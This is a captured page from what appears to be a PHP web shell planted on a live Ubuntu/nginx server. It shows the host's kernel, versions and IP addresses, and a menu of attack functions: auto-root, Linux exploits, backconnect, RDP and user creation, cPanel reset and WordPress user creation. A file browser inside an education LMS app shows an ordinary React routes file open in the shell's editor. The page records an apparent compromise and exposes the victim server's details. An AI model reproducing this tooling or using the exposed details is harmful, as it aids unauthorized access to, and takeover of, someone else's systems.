Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
edu-lms /
app /
containers /
front /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
authorized.route.tsx
585
B
-rw-r--r--
menus.front.tsx
620
B
-rw-r--r--
routes.front.tsx
1.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : routes.front.tsx
import * as React from 'react'; import { Redirect } from 'react-router'; import { Dashboard,Subject,CourseSummary } from 'containers/front'; import NotFound from 'containers/default/NotFoundPage'; import { Types } from 'containers/auth/store/constant'; import storage from 'helpers/storage'; import { ReactLazyPreload } from '../../../edusewa/components/ReactLazyPreload' // const App = ReactLazyPreload(() => // import(/* webpackChunkName: "app" */ './../../../edusewa/components/App') // ) const App = ReactLazyPreload(() => import(/* webpackChunkName: "app" */ '../../../edusewa/index') ) const routes = [ { path: '/dashboard', exact: true, name:"Dashboard", component: Dashboard, }, { path: '/course/:subject_code/:subject_id/:tab?', exact: true, name:"Subject", component: Subject, }, { path: '/course/:subject_code/:subject_id/:content/:content_id/:chapter/:chapter_id/:tab?', exact: true, name:"Subject", component: Subject, }, { path: '/edusewa/:room', exact: true, name:"Edusewa", component: App, }, { component: NotFound, }, ]; export default routes;
Close